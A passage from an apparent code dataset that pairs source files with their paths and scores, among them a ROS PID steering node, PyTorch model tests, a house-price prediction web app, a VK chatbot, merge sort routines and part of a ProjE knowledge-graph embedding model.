self.pid_parameter = self.read_param_from_file(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
for keys in self.pid_parameter:
self.setup_parameter("~" + keys, self.pid_parameter[keys])
# local parameter
self.initialize = True
# setup the rqt_reconfigure
self.reconfigure = Server(PID_ControlConfig, self.set_pid_parameter)
# setup the subscriber
self.sub_msg_inference = rospy.Subscriber("~inference", Inference, self.inference_analyze, queue_size=1)
# setup the publisher
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# setup service
self.srv_save_pid = rospy.Service("~save_pid", save_action, self.srv_save_pid)
def getFilePath(self, package, folder, file_name):
rospack = rospkg.RosPack()
return rospack.get_path(package) + "/" + folder + "/" + file_name
def read_param_from_file(self, package, folder, file_name):
fname = self.getFilePath(package, folder, file_name)
if not os.path.isfile(fname):
if file_name == (self.veh_name + "_pid.yaml"):
rospy.loginfo("[{}] {} does not exist. Using \"default_pid.yaml\" to load parameter".format(self.node_name, fname))
fname = self.getFilePath(package, folder, file_name="default_pid.yaml")
with open(fname, 'r') as in_file:
try:
                yaml_dict = yaml.safe_load(in_file)
except yaml.YAMLError as exc:
rospy.loginfo("[{}] YAML syntax error. File: {}".format(self.node_name, fname))
return yaml_dict
def set_pid_parameter(self, config, level):
if self.initialize == True:
for keys in self.pid_parameter:
config[keys] = self.pid_parameter[keys]
self.initialize = False
else:
for keys in self.pid_parameter:
self.pid_parameter[keys] = config[keys]
if config["save_parameter"]:
self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
config["save_parameter"] = False
return config
def inference_analyze(self, data):
angle = data.angle
angle_last = data.angle_last
pid = angle * self.pid_parameter["steering_gain"] + (angle - angle_last) * self.pid_parameter["steering_kd"]
steering_value = pid + self.pid_parameter["steering_bias"]
car_cmd_msg = Twist2DStamped()
#car_cmd_msg.header.stamp = self.joy.header.stamp
car_cmd_msg.v = self.pid_parameter["speed_gain"]
car_cmd_msg.omega = steering_value
        self.pub_msg(car_cmd_msg)
def pub_msg(self, car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
    def srv_save_pid(self, request):
        self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
        return save_actionResponse()
def save_pid_parameter(self, package, folder, file_name):
fname = rospkg.RosPack().get_path(package) + "/" + folder + "/" + file_name
with open(fname, 'w') as outfile:
outfile.write(yaml.dump(self.pid_parameter, default_flow_style=False))
rospy.loginfo("[{}] Save parameter in {}.".format(self.node_name, fname))
def setup_parameter(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
# Write to parameter server for transparency
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
def on_shutdown(self):
rospy.loginfo("[{}] Close.".format(self.node_name))
rospy.loginfo("[{}] shutdown.".format(self.node_name))
rospy.sleep(1)
        # rospy is already shutting down when this hook runs; no extra flag needs to be set
if __name__ == "__main__" :
rospy.init_node("road_inference_to_reaction", anonymous=False)
inference_to_reaction_node = Inference_To_Reaction()
rospy.on_shutdown(inference_to_reaction_node.on_shutdown)
rospy.spin()
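# --- Illustrative sketch (my addition): the steering law used in inference_analyze ---
# It is a simple PD controller on the predicted road angle; the gain values below are
# placeholders, not the values shipped in the package's yaml files.
def steering_from_angle(angle, angle_last, gain=1.0, kd=0.1, bias=0.0):
    """Proportional term on the current angle plus a derivative term on its change."""
    return angle * gain + (angle - angle_last) * kd + bias
# e.g. steering_from_angle(0.2, 0.1) is approximately 0.21 with the placeholder gains above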
|
catkin_ws/src/deep_learning/road_following/src/road_inference_to_reaction.py
|
import os, sys, argparse, errno, yaml, time, datetime
import rospy, rospkg
import numpy as np
from road_following.msg import Inference
from road_following.cfg import PID_ControlConfig
from road_following.srv import save_action, save_actionResponse
from rosky_msgs.msg import Twist2DStamped
from dynamic_reconfigure.server import Server
class Inference_To_Reaction(object):
def __init__(self):
self.package = "road_following"
self.node_name = rospy.get_name()
self.veh_name = self.node_name.split("/")[1]
rospy.loginfo("[{}] Initializing road_inference_to_reaction.py......".format(self.node_name))
self.start = rospy.wait_for_message("/" + self.veh_name +"/road_model_inference/inference", Inference)
# ros parameter
self.pid_parameter = self.read_param_from_file(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
for keys in self.pid_parameter:
self.setup_parameter("~" + keys, self.pid_parameter[keys])
# local parameter
self.initialize = True
# setup the rqt_reconfigure
self.reconfigure = Server(PID_ControlConfig, self.set_pid_parameter)
# setup the subscriber
self.sub_msg_inference = rospy.Subscriber("~inference", Inference, self.inference_analyze, queue_size=1)
# setup the publisher
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# setup service
self.srv_save_pid = rospy.Service("~save_pid", save_action, self.srv_save_pid)
def getFilePath(self, package, folder, file_name):
rospack = rospkg.RosPack()
return rospack.get_path(package) + "/" + folder + "/" + file_name
def read_param_from_file(self, package, folder, file_name):
fname = self.getFilePath(package, folder, file_name)
if not os.path.isfile(fname):
if file_name == (self.veh_name + "_pid.yaml"):
rospy.loginfo("[{}] {} does not exist. Using \"default_pid.yaml\" to load parameter".format(self.node_name, fname))
fname = self.getFilePath(package, folder, file_name="default_pid.yaml")
with open(fname, 'r') as in_file:
try:
                yaml_dict = yaml.safe_load(in_file)
except yaml.YAMLError as exc:
rospy.loginfo("[{}] YAML syntax error. File: {}".format(self.node_name, fname))
return yaml_dict
def set_pid_parameter(self, config, level):
if self.initialize == True:
for keys in self.pid_parameter:
config[keys] = self.pid_parameter[keys]
self.initialize = False
else:
for keys in self.pid_parameter:
self.pid_parameter[keys] = config[keys]
if config["save_parameter"]:
self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
config["save_parameter"] = False
return config
def inference_analyze(self, data):
angle = data.angle
angle_last = data.angle_last
pid = angle * self.pid_parameter["steering_gain"] + (angle - angle_last) * self.pid_parameter["steering_kd"]
steering_value = pid + self.pid_parameter["steering_bias"]
car_cmd_msg = Twist2DStamped()
#car_cmd_msg.header.stamp = self.joy.header.stamp
car_cmd_msg.v = self.pid_parameter["speed_gain"]
car_cmd_msg.omega = steering_value
        self.pub_msg(car_cmd_msg)
def pub_msg(self, car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
    def srv_save_pid(self, request):
        self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
        return save_actionResponse()
def save_pid_parameter(self, package, folder, file_name):
fname = rospkg.RosPack().get_path(package) + "/" + folder + "/" + file_name
with open(fname, 'w') as outfile:
outfile.write(yaml.dump(self.pid_parameter, default_flow_style=False))
rospy.loginfo("[{}] Save parameter in {}.".format(self.node_name, fname))
def setup_parameter(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
# Write to parameter server for transparency
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
def on_shutdown(self):
rospy.loginfo("[{}] Close.".format(self.node_name))
rospy.loginfo("[{}] shutdown.".format(self.node_name))
rospy.sleep(1)
        # rospy is already shutting down when this hook runs; no extra flag needs to be set
if __name__ == "__main__" :
rospy.init_node("road_inference_to_reaction", anonymous=False)
inference_to_reaction_node = Inference_To_Reaction()
rospy.on_shutdown(inference_to_reaction_node.on_shutdown)
rospy.spin()
| 0.36886 | 0.095476 |
import unittest
class TestCantor(unittest.TestCase):
def test_cantor_initiator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
# Get output
# noinspection PyCallingNonCallable
output = initiator(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_module(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
module = cantor.CantorModule(base_width=30)
model = Sequential2(initiator, module)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_terminator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
terminator = cantor.CantorTerminator(1, base_width=30, activation='Sigmoid')
model = Sequential2(initiator, terminator)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(list(output.size()), [1, 1, 128, 128])
def test_cantor(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
input_shape = [1, 1, 3, 128, 128]
model = cantor.Cantor.from_shape(input_shape=input_shape,
base_width=30,
num_modules=3,
output_activation='Sigmoid')
input = Variable(torch.rand(*input_shape))
output = model(input)
self.assertEqual(list(output.size()), input_shape)
if __name__ == '__main__':
unittest.main()
|
tests/neurofire/models/test_cantor.py
|
import unittest
class TestCantor(unittest.TestCase):
def test_cantor_initiator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
# Get output
# noinspection PyCallingNonCallable
output = initiator(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_module(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
module = cantor.CantorModule(base_width=30)
model = Sequential2(initiator, module)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_terminator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
terminator = cantor.CantorTerminator(1, base_width=30, activation='Sigmoid')
model = Sequential2(initiator, terminator)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(list(output.size()), [1, 1, 128, 128])
def test_cantor(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
input_shape = [1, 1, 3, 128, 128]
model = cantor.Cantor.from_shape(input_shape=input_shape,
base_width=30,
num_modules=3,
output_activation='Sigmoid')
input = Variable(torch.rand(*input_shape))
output = model(input)
self.assertEqual(list(output.size()), input_shape)
if __name__ == '__main__':
unittest.main()
| 0.667581 | 0.605099 |
import streamlit as st
import math
import numpy as np
from flask import Flask, request, jsonify, render_template
from model import Model
app = Flask(__name__)
@app.route('/')
def home():
return render_template('login.html')
@app.route('/realapp')
def realapp():
"""
Returns
-------
Run App
"""
#load Module class
# Create a text element and let the reader know the data is loading.
with st.spinner(text='In progress'):
#data_load_state = st.text('Loading data & model...')
# Notify the reader that the data was successfully loaded.
__model = Model()
st.success('Model Ready')
#Dataset & zones
df = __model.dataset_preprocessed
#Parking Space Price
parking_price_df =(
df.loc[df['parkingSpacePrice']>1000].
groupby('district').mean()['parkingSpacePrice'])
#Title & Header Image
st.title('Evaluate your home in Telangana')
st.subheader("Discover the market value of your home convenient and easy with one click")
st.image('./data/Header Varese.jpg',use_column_width=True)
st.subheader ("We use a Machine Learning algorithm on %s properties"
% len(df))
#Parameters
st.subheader("Set the property parameters")
#City
    city = st.selectbox('City', ['Warangal', 'Suryapet'], index=0)
    if city == 'Warangal':
        selector_city = 'WG - '
    else:
        selector_city = 'SU - '
#Zone
zonesList = (
df.loc[df['district'].str.startswith (selector_city)]['district'].unique().tolist()
)
#Replace prefix
zonesList = [i.replace(selector_city,'') for i in zonesList]
district = st.selectbox('Zone', zonesList, index = 0)
#Property Type List
propertyTypelist = __model.propertyTypeList
propertyType = st.selectbox('Kind', propertyTypelist, index = 0)
#Conversiont to model variables
propertyType = __model.propertyTypeConverter(propertyType)
#Rest of parameters
size = st.number_input('Square meters',
min_value=10,
max_value=5000,
value = 100
)
rooms = st.slider('Locals',
min_value = 1,
max_value = 10,
value = 3)
#Conversiont to model variables
#roomsCat = __model.roomsCategory(rooms)
if rooms >= 4:
roomsCat = 4
else:
roomsCat = rooms
#Bathrooms
bathrooms = st.slider('Bathrooms',
min_value = 1,
max_value = 10,
value = 2
)
#Conversiont to model variables
if bathrooms >= 2:
bathroomsCat = 2
else:
bathroomsCat = bathrooms
    # Status labels
status_it = __model.statusList
status = st.radio('State',status_it, index = 1)
#Conversiont to model variables
statusOutput = 'good'
if status == "To be restructured":
statusOutput = 'renew'
elif status == "Good":
statusOutput = 'good'
elif status == "New Construction ":
statusOutput = 'newdevelopment'
    # Extra features
#parkingBox = st.checkbox('Posto Auto - Box', value = 0)
#garden = st.checkbox('Giardino- Terrazzo', value = 0)
#swimming_pool = st.checkbox('Piscina', value = 0)
#Parking Space District Selected
try:
parking_space = int(
parking_price_df.loc[parking_price_df.index==
(selector_city+district)].values[0])
except:
parking_space = 0
#Button to value
    button = st.button('Predict Cost')
if button:
value_model = __model.predict(
size,
propertyType,
(selector_city+district),
statusOutput,
roomsCat,
bathroomsCat,
)
value = int(math.ceil((value_model ) / 5000.0) * 5000.0)
st.write("Market value")
st.write("₹{:,.0f}".format(value))
if parking_space > 0:
st.write("Average price %s - %s " % (city,district))
st.write("₹{:,.0f}".format(parking_space))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=6442)
#app_run()
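# --- Illustrative note (my addition): how the displayed price is rounded above ---
# The model output is rounded *up* to the nearest 5000 before being shown.
def round_up_to_step(value, step=5000):
    return int(math.ceil(value / float(step)) * step)
# e.g. round_up_to_step(1234567) -> 1235000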
|
app.py
|
import streamlit as st
import math
import numpy as np
from flask import Flask, request, jsonify, render_template
from model import Model
app = Flask(__name__)
@app.route('/')
def home():
return render_template('login.html')
@app.route('/realapp')
def realapp():
"""
Returns
-------
Run App
"""
#load Module class
# Create a text element and let the reader know the data is loading.
with st.spinner(text='In progress'):
#data_load_state = st.text('Loading data & model...')
# Notify the reader that the data was successfully loaded.
__model = Model()
st.success('Model Ready')
#Dataset & zones
df = __model.dataset_preprocessed
#Parking Space Price
parking_price_df =(
df.loc[df['parkingSpacePrice']>1000].
groupby('district').mean()['parkingSpacePrice'])
#Title & Header Image
st.title('Evaluate your home in Telangana')
st.subheader("Discover the market value of your home convenient and easy with one click")
st.image('./data/Header Varese.jpg',use_column_width=True)
st.subheader ("We use a Machine Learning algorithm on %s properties"
% len(df))
#Parameters
st.subheader("Set the property parameters")
#City
    city = st.selectbox('City', ['Warangal', 'Suryapet'], index=0)
    if city == 'Warangal':
        selector_city = 'WG - '
    else:
        selector_city = 'SU - '
#Zone
zonesList = (
df.loc[df['district'].str.startswith (selector_city)]['district'].unique().tolist()
)
#Replace prefix
zonesList = [i.replace(selector_city,'') for i in zonesList]
district = st.selectbox('Zone', zonesList, index = 0)
#Property Type List
propertyTypelist = __model.propertyTypeList
propertyType = st.selectbox('Kind', propertyTypelist, index = 0)
#Conversiont to model variables
propertyType = __model.propertyTypeConverter(propertyType)
#Rest of parameters
size = st.number_input('Square meters',
min_value=10,
max_value=5000,
value = 100
)
rooms = st.slider('Locals',
min_value = 1,
max_value = 10,
value = 3)
#Conversiont to model variables
#roomsCat = __model.roomsCategory(rooms)
if rooms >= 4:
roomsCat = 4
else:
roomsCat = rooms
#Bathrooms
bathrooms = st.slider('Bathrooms',
min_value = 1,
max_value = 10,
value = 2
)
#Conversiont to model variables
if bathrooms >= 2:
bathroomsCat = 2
else:
bathroomsCat = bathrooms
    # Status labels
status_it = __model.statusList
status = st.radio('State',status_it, index = 1)
#Conversiont to model variables
statusOutput = 'good'
if status == "To be restructured":
statusOutput = 'renew'
elif status == "Good":
statusOutput = 'good'
elif status == "New Construction ":
statusOutput = 'newdevelopment'
    # Extra features
#parkingBox = st.checkbox('Posto Auto - Box', value = 0)
#garden = st.checkbox('Giardino- Terrazzo', value = 0)
#swimming_pool = st.checkbox('Piscina', value = 0)
#Parking Space District Selected
try:
parking_space = int(
parking_price_df.loc[parking_price_df.index==
(selector_city+district)].values[0])
except:
parking_space = 0
#Button to value
    button = st.button('Predict Cost')
if button:
value_model = __model.predict(
size,
propertyType,
(selector_city+district),
statusOutput,
roomsCat,
bathroomsCat,
)
value = int(math.ceil((value_model ) / 5000.0) * 5000.0)
st.write("Market value")
st.write("₹{:,.0f}".format(value))
if parking_space > 0:
st.write("Average price %s - %s " % (city,district))
st.write("₹{:,.0f}".format(parking_space))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=6442)
#app_run()
| 0.385375 | 0.258097 |
import requests
from typing import Callable, Union, Optional
from .objects import SendableMessage
def get_session_requests():
session = requests.Session()
session.headers['Accept'] = 'application/json'
session.headers['Content-Type'] = 'application/x-www-form-urlencoded'
return session
class VKChatBot:
def __init__(self, access_token, group_id, api_url='https://api.vk.com/method/', v='5.80',
command_prefix='!'):
self.access_token = access_token
self.group_id = group_id
self.api_url = api_url
self.api_version = v
self._session = get_session_requests()
self._prefix = command_prefix
self._commands = {}
        self.unknown_command_msg = 'Unknown command. Type %shelp to see the list of commands' % command_prefix
def unknown_command_handler(self, event) -> Optional[Union[str, SendableMessage]]:
return self.unknown_command_msg
def _poll_events(self):
poll = self._session.get(url=f'{self.api_url}groups.getLongPollServer', params={
'group_id': self.group_id,
'access_token': self.access_token,
'v': self.api_version
}).json()['response']
server, key, ts = poll['server'], poll['key'], poll['ts']
while True:
long_poll = self._session.post(server, data={
'act': 'a_check',
'key': key,
'ts': ts,
'wait': 25,
}).json()
for update in long_poll['updates']:
yield update
ts = long_poll['ts']
def register_command(self, command: str, handler: Callable):
self._commands[command] = handler
def unregister_command(self, command: str):
del self._commands[command]
def _process_command(self, event):
text = event['object']['text']
if not text.startswith(self._prefix):
return
cmd = text.lower().split()[0][len(self._prefix):]
handler = self._commands.get(cmd, self.unknown_command_handler)
return handler(event)
def send_message(self, peer_id, message: Union[str, SendableMessage]):
if isinstance(message, str):
params = {'message': message}
else:
params = message.to_dict()
self._session.post(f'{self.api_url}messages.send', data={
'peer_id': peer_id,
'access_token': self.access_token,
'v': self.api_version,
**params,
})
def work(self):
for event in self._poll_events():
if event['type'] == 'message_new':
result = self._process_command(event)
if result is not None:
peer_id = event['object']['peer_id']
self.send_message(peer_id, result)
__all__ = ['VKChatBot', 'objects']
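# --- Illustrative usage sketch (my addition, not part of the package) ---
# The token, group id and handler below are placeholders; a handler returns the text
# (or SendableMessage) the bot should send back for the given event.
if __name__ == '__main__':
    def ping_handler(event):
        return 'pong'

    bot = VKChatBot(access_token='YOUR_TOKEN', group_id=123456, command_prefix='!')
    bot.register_command('ping', ping_handler)   # replies to "!ping"
    bot.work()                                   # blocks, long-polling for new messages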
|
vkchatbot/__init__.py
|
import requests
from typing import Callable, Union, Optional
from .objects import SendableMessage
def get_session_requests():
session = requests.Session()
session.headers['Accept'] = 'application/json'
session.headers['Content-Type'] = 'application/x-www-form-urlencoded'
return session
class VKChatBot:
def __init__(self, access_token, group_id, api_url='https://api.vk.com/method/', v='5.80',
command_prefix='!'):
self.access_token = access_token
self.group_id = group_id
self.api_url = api_url
self.api_version = v
self._session = get_session_requests()
self._prefix = command_prefix
self._commands = {}
        self.unknown_command_msg = 'Unknown command. Type %shelp to see the list of commands' % command_prefix
def unknown_command_handler(self, event) -> Optional[Union[str, SendableMessage]]:
return self.unknown_command_msg
def _poll_events(self):
poll = self._session.get(url=f'{self.api_url}groups.getLongPollServer', params={
'group_id': self.group_id,
'access_token': self.access_token,
'v': self.api_version
}).json()['response']
server, key, ts = poll['server'], poll['key'], poll['ts']
while True:
long_poll = self._session.post(server, data={
'act': 'a_check',
'key': key,
'ts': ts,
'wait': 25,
}).json()
for update in long_poll['updates']:
yield update
ts = long_poll['ts']
def register_command(self, command: str, handler: Callable):
self._commands[command] = handler
def unregister_command(self, command: str):
del self._commands[command]
def _process_command(self, event):
text = event['object']['text']
if not text.startswith(self._prefix):
return
cmd = text.lower().split()[0][len(self._prefix):]
handler = self._commands.get(cmd, self.unknown_command_handler)
return handler(event)
def send_message(self, peer_id, message: Union[str, SendableMessage]):
if isinstance(message, str):
params = {'message': message}
else:
params = message.to_dict()
self._session.post(f'{self.api_url}messages.send', data={
'peer_id': peer_id,
'access_token': self.access_token,
'v': self.api_version,
**params,
})
def work(self):
for event in self._poll_events():
if event['type'] == 'message_new':
result = self._process_command(event)
if result is not None:
peer_id = event['object']['peer_id']
self.send_message(peer_id, result)
__all__ = ['VKChatBot', 'objects']
| 0.766075 | 0.057812 |
# Merge Sort function using loops
def merge_sort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return mergeUsingLoops(left, right)
else:
# Return array with single element
return array
# Merge function using loops
def mergeUsingLoops(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
result = []
i, j = 0, 0
# Comparing values of both parts
while(len(result) < len(left) + len(right)):
if left[i] < right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
# Copying the remaining elements of one part
if i == len(left) or j == len(right):
result.extend(left[i:] or right[j:])
break
return result
# Merge Sort using second function
def mergesort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
        # Merge sorting left half (recurse with this variant so the recursive merge is used throughout)
        left = mergesort(left_half)
        # Merge sorting right half
        right = mergesort(right_half)
# Merge the two halves & return it
return merge(left, right)
else:
# Return array with single element
return array
# Merge function
def merge(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
# Compare first element and merge the remaining elements of the part (with smaller element) with other part
if left[0] < right[0]:
return [left[0]] + merge(left[1:], right)
return [right[0]] + merge(left, right[1:])
# Example
array = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print("Merge Sort for ", array)
print("Sorted array using loops: ", merge_sort(array))
print("Sorted array using another function: ", mergesort(array))
|
Sorting Algorithms/Merge Sort Algorithm/Python/MergeSort.py
|
# Merge Sort function using loops
def merge_sort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return mergeUsingLoops(left, right)
else:
# Return array with single element
return array
# Merge function using loops
def mergeUsingLoops(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
result = []
i, j = 0, 0
# Comparing values of both parts
while(len(result) < len(left) + len(right)):
if left[i] < right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
# Copying the remaining elements of one part
if i == len(left) or j == len(right):
result.extend(left[i:] or right[j:])
break
return result
# Merge Sort using second function
def mergesort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
        # Merge sorting left half (recurse with this variant so the recursive merge is used throughout)
        left = mergesort(left_half)
        # Merge sorting right half
        right = mergesort(right_half)
# Merge the two halves & return it
return merge(left, right)
else:
# Return array with single element
return array
# Merge function
def merge(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
# Compare first element and merge the remaining elements of the part (with smaller element) with other part
if left[0] < right[0]:
return [left[0]] + merge(left[1:], right)
return [right[0]] + merge(left, right[1:])
# Example
array = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print("Merge Sort for ", array)
print("Sorted array using loops: ", merge_sort(array))
print("Sorted array using another function: ", mergesort(array))
| 0.605799 | 0.803097 |
from typing import Optional
import numpy
import torch
import torch.autograd
from torch import nn
from ..base import EntityRelationEmbeddingModel
from ...losses import Loss
from ...nn.init import xavier_uniform_
from ...regularizers import Regularizer
from ...triples import TriplesFactory
from ...typing import DeviceHint
__all__ = [
'ProjE',
]
class ProjE(EntityRelationEmbeddingModel):
r"""An implementation of ProjE from [shi2017]_.
ProjE is a neural network-based approach with a *combination* and a *projection* layer. The interaction model
first combines $h$ and $r$ by following combination operator:
.. math::
\textbf{h} \otimes \textbf{r} = \textbf{D}_e \textbf{h} + \textbf{D}_r \textbf{r} + \textbf{b}_c
where $\textbf{D}_e, \textbf{D}_r \in \mathbb{R}^{k \times k}$ are diagonal matrices which are used as shared
parameters among all entities and relations, and $\textbf{b}_c \in \mathbb{R}^{k}$ represents the candidate bias
vector shared across all entities. Next, the score for the triple $(h,r,t) \in \mathbb{K}$ is computed:
.. math::
f(h, r, t) = g(\textbf{t} \ z(\textbf{h} \otimes \textbf{r}) + \textbf{b}_p)
where $g$ and $z$ are activation functions, and $\textbf{b}_p$ represents the shared projection bias vector.
.. seealso::
- Official Implementation: https://github.com/nddsg/ProjE
"""
#: The default strategy for optimizing the model's hyper-parameters
hpo_default = dict(
embedding_dim=dict(type=int, low=50, high=350, q=25),
)
#: The default loss function class
loss_default = nn.BCEWithLogitsLoss
#: The default parameters for the default loss function class
loss_default_kwargs = dict(reduction='mean')
def __init__(
self,
triples_factory: TriplesFactory,
embedding_dim: int = 50,
automatic_memory_optimization: Optional[bool] = None,
loss: Optional[Loss] = None,
preferred_device: DeviceHint = None,
random_seed: Optional[int] = None,
inner_non_linearity: Optional[nn.Module] = None,
regularizer: Optional[Regularizer] = None,
) -> None:
super().__init__(
triples_factory=triples_factory,
embedding_dim=embedding_dim,
automatic_memory_optimization=automatic_memory_optimization,
loss=loss,
preferred_device=preferred_device,
random_seed=random_seed,
regularizer=regularizer,
entity_initializer=xavier_uniform_,
relation_initializer=xavier_uniform_,
)
# Global entity projection
self.d_e = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global relation projection
self.d_r = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_c = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_p = nn.Parameter(torch.empty(1, device=self.device), requires_grad=True)
if inner_non_linearity is None:
inner_non_linearity = nn.Tanh()
self.inner_non_linearity = inner_non_linearity
def _reset_parameters_(self): # noqa: D102
super()._reset_parameters_()
bound = numpy.sqrt(6) / self.embedding_dim
nn.init.uniform_(self.d_e, a=-bound, b=bound)
nn.init.uniform_(self.d_r, a=-bound, b=bound)
nn.init.uniform_(self.b_c, a=-bound, b=bound)
nn.init.uniform_(self.b_p, a=-bound, b=bound)
def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hrt_batch[:, 0])
r = self.relation_embeddings(indices=hrt_batch[:, 1])
t = self.entity_embeddings(indices=hrt_batch[:, 2])
# Compute score
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden * t, dim=-1, keepdim=True) + self.b_p
return scores
def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hr_batch[:, 0])
r = self.relation_embeddings(indices=hr_batch[:, 1])
t = self.entity_embeddings(indices=None)
# Rank against all entities
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden[:, None, :] * t[None, :, :], dim=-1) + self.b_p
return scores
def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=None)
